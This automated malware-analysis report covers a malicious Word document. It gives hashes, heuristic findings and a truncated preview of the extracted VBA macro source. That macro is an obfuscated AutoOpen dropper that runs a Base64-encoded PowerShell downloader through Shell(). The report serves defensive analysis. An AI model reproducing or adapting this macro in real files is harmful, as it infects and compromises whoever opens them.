Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a4b927f123929d34…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 80.8 KB
Created: 2018-06-07 21:44:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: 65d1398f8d9d082ace00d8e671c6ada5
SHA-1: 206d590f6887a3a0bb23897a57e1708ba68c9a4c
SHA-256: a4b927f123929d344aca679f0dcc58cf4a8507c1268d4bdfba5bede1035200ea
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function that calls Shell() to execute a PowerShell command. The PowerShell command line is obfuscated with Base64 encoding and appears designed to download and execute a second-stage payload. Together, the Shell() call and the obfuscated PowerShell command strongly indicate dropper or downloader functionality.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6577061-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6577061-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10997 bytes
SHA-256: e268f62d5020e3a4a31c80881b4c4e029686f40a54326950cddbde28ee117f3b
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "WKlPfBQGqOzIJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function EjIut()
On Error Resume Next
bdrbwk = Tan(hkzmoD _
* Tan(WMijAm * Int(jdvSZj * Sqr(43899) / SXWLw + Fix(1521)) / 60222 * Round(95934 / Log(21096 - GdTpiX) + 70292 - vGfNqO)) _
/ 44554 + Log(78690))
AwIZAb = Tan(RZPcH _
* Tan(qOTEtJ * Int(tuYhho * Sqr(31924) / FhIoHH + Fix(59777)) / 3459 * Round(4385 / Log(4538 - CBXIH) + 14544 - JPRtlV)) _
/ 27019 + Log(21383))
EjIut = tOihEYwGlZ + Shell(kriniYq + Chr(HIEzz + vbKeyP + NBbFA) + wlsHjZMDD + VdlTvJHvJz + ckJazwP + DwhnQZuCJw, 19538 - 19538)
FXarMK = Tan(MsHoAd _
* Tan(MRCmG * Int(WmRazi * Sqr(2344) / Lvnaw + Fix(17538)) / 49685 * Round(57948 / Log(53040 - trULP) + 99802 - jjDEc)) _
/ 67867 + Log(66281))
End Function
Sub Autoopen()
On Error Resume Next
jcSGA = Tan(iJOBzU _
* Tan(EUlip * Int(sOHLWR * Sqr(14387) / zzOiM + Fix(8927)) / 36191 * Round(24748 / Log(62657 - XbRLi) + 12765 - SfEfL)) _
/ 34029 + Log(42469))
EjIut
rpsbRw = Tan(sfkLzS _
* Tan(PvrofK * Int(ahjAA * Sqr(8308) / Cimfsw + Fix(38971)) / 28535 * Round(49835 / Log(71244 - Kiilb) + 43412 - rjPJn)) _
/ 45154 + Log(74392))
End Sub



Attribute VB_Name = "XRIMbQsD"
Function wlsHjZMDD()
On Error Resume Next
AiiZi = Tan(VAhjZ _
* Tan(fJzJiC * Int(NiEQKJ * Sqr(10382) / LEJMH + Fix(48010)) / 23531 * Round(17813 / Log(17954 - cnpmT) + 51502 - tCWVAw)) _
/ 27103 + Log(34445))
LTFfkdfWD = "ower" + "sHe" + "LL -e IAA" + "oACAAbgBlAHcAL" + "QBvAGIASgBFAGMA" + "VAAgAFMAeQBzAHQ" + "ARQBNAC4AaQ" + "BvAC4AQwBPAG0A"
zivOT = Tan(ZAKwY _
* Tan(RZSAn * Int(GPnaLd * Sqr(41099) / HivLI + Fix(90280)) / 88873 * Round(10959 / Log(48151 - NuBMNp) + 55242 - CXcdD)) _
/ 41060 + Log(23864))
iCNHdXdw = "cABSA" + "GUAcw" + "BTAEkATwBuAC4A" + "RABFAEYA" + "TABhAFQARQBTAFQ"
HCOZX = Tan(tCHqE _
* Tan(odcMzp * Int(tmtBww * Sqr(76668) / zoifZw + Fix(109)) / 75429 * Round(84018 / Log(82697 - GwBzFX) + 69585 - iYvPdO)) _
/ 67063 + Log(36922))
jUGnzfddOEA = "AcgBFA" + "GEAbQAoAFsA" + "UwBZAFM" + "AdABFAG0AL" + "gBpAG8ALgBtAG"
OBQaj = Tan(vNcLfz _
* Tan(qlVAiq * Int(nodOUE * Sqr(6866) / ZBQrf + Fix(58043)) / 47945 * Round(81863 / Log(51295 - WGFlc) + 23576 - iuhKu)) _
/ 55789 + Log(60817))
TQimJs = "UATQBvAFIAeQ" + "BzAFQAUgB" + "FAGEAbQBdAFs" + "AcwBZAHMAd" + "AB" + "FAE0ALgBDAG8AT"
biaXCG = Tan(mtoauo _
* Tan(KRuub * Int(jnBLR * Sqr(17460) / KVsiYl + Fix(96936)) / 9211 * Round(91103 / Log(97526 - YRsUL) + 92627 - RRKkQ)) _
/ 29931 + Log(232))
BWwwawCQX = "gBWAG" + "UAUgBUAF0A" + "OgA6A" + "EYA" + "UgBvAG0AQgBB" + "AHMAZQA2ADQ" + "AUwBUAHIASQBOA"
TInjO = Tan(tRUQA _
* Tan(BJpPO * Int(bWJTP * Sqr(52663) / JzsfZ + Fix(11148)) / 55561 * Round(58177 / Log(44129 - pQOjN) + 60484 - XDKlz)) _
/ 16886 + Log(52662))
LiphrZh = "EcAKA" + "AgACcAVg" + "BaAEIAYg" + "BUADgAS" + "gBBAEUASQB" + "YAC8AeQBqADQAMA" + "BhAFIAdABsA" + "EsAeQBKAEcAYQ"
wlsHjZMDD = LTFfkdfWD + iCNHdXdw + jUGnzfddOEA + TQimJs + BWwwawCQX + LiphrZh
End Function
Function VdlTvJHvJz()
On Error Resume Next
Vzoisz = Tan(MbFFBm _
* Tan(KYjirA * Int(AjNqIv * Sqr(22226) / UJrQj + Fix(7748)) / 16625 * Round(77717 / Log(282 - RwEniI) + 58492 - dtmFU)) _
/ 33313 + Log(52548))
ERwiDjMocj = "BVAHc" + "AdwBYAEwAdwBrAE" + "kASwBFAG8" + "AYQBrAHo" + "ATQBkAGoAdg" + "BRAHA"
VObnkD = Tan(vGvOkC _
* Tan(BjjAZD * Int(MEFMuS * Sqr(34842) / OoZpmi + Fix(89467)) / 25243 * Round(24226 / Log(88183 - OIjit) + 88526 - nrCZU)) _
/ 84315 + Log(45334))
lsFSSt = "AZQAwAHUAYg" + "BFAGQASwBKAGY" + "AeAAzAGwA" + "MQBzAE" + "0AT" + "AA1AF"
IJWbp = Tan(PRrHpv _
* Tan(HHWTG * Int(pljVL * Sqr(34833) / fabpUh + Fix(34156)) / 66909 * Round(49594 / Log(70927 - lDcwqo) + 52863 - wufkj)) _
/ 10393 + Log(25299))
kfBQpGGY = "AATQBuAEc" + "AOAB5AGMANAA" + "1AD" + "EAUAAzAHUAWQB" + "QAEMAbAB5A" + "FIA" + "eQBRAFUARgB" + "SAFgATwBnAE" + "MAUABSA" + "FQARQBZAHEAO"
iRcnKJ = Tan(FpqBm 
... (truncated)